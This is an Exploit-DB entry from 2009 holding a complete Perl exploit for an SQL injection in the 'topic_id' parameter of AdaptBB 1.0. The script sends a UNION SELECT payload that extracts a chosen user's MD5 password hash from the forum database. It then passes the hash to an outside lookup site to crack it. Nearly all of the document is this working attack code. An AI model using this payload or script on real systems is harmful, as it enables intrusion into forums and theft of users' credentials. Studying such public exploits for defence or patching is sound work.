AdaptBB 1.0 - 'topic_id' SQL Injection / Credentials Disclosure

EDB-ID:

8351

Author:

StAkeR

Type:

webapps

Platform:

PHP

Published:

2009-04-03

#!/usr/bin/perl -w
#
# AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit
# 
# Description
# -----------
# AdaptBB contains a flaw that allows an attacker to carry out an SQL 
# injection attack. The issue is due to the inc/bb/topic.php script not 
# properly sanitizing user-supplied input to the 'topic_id' variable. This may 
# allow an attacker to inject or manipulate SQL queries in the backend 
# database if magic_quotes_gpc = off.
# -----------
# by Juri Gianni aka yeat - staker[at]hotmail[dot]it


use strict;
use LWP::Simple;
use IO::Socket;


our ($host,$path,$username) = @ARGV;

if (@ARGV != 3) 
{
       print "\n+-----------------------------------------------------------------------+\n".
             "\r| AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit |\n".
             "\r+-----------------------------------------------------------------------+\n".
             "\rby yeat - staker[at]hotmail[dot]it\n".
             "\nUsage: perl $0 host /path/ username\n".
             "\nhost: localhost\n".
             "\rpath: /adaptbb/\n".
             "\rusername: target username\n";
       exit;
}  

if ($username =~ /(\w+)/i) {
   print "Victim: $username\n";
   exploit();
}   

sub exploit
{
       my ($packet,$html,$inject,$socket);
       
       $inject = "%27/**/UNION/**/SELECT/**/password,2,3,4,5,6,7,8,9,10/**/".
                 "FROM/**/adaptbb_users/**/WHERE/**/username='$username'%23";
       
       $socket = new IO::Socket::INET(
                                      PeerAddr => $host,
                                      PeerPort => 80,
                                      Proto    => 'tcp',
                                    ) or die $!;
                                        
                                          
      $packet .= "GET $path/index.php?do=topic&topic_id=$inject\r\n";
      $packet .= "Host: $host\r\n";
      $packet .= "User-Agent: Lynx (textmode)\r\n";
      $packet .= "Connection: close\r\n\r\n";
      
      $socket->send($packet);
      
      while (<$socket>) {
         $html .= $_;
      }          
      
      if ($html =~ /Re: ([a-f0-9]{32})"/i) {
         print "Exploit successful\nMD5: $1\n";
         print "Password Cracked: ".search_md5($1)."\n";
      }
      else {
         print "Exploit unsuccesful..\n";
      }      
}      
    

sub search_md5
{
     my $hash = shift @_;
     my $cont = undef;
     
     if ($hash =~ /^([a-f0-9]{32})$/i) {
        return get("http://md5.rednoize.com/?p&s=md5&q=$hash");
     }
     else {
        return 404;
     }      
}   

# milw0rm.com [2009-04-03]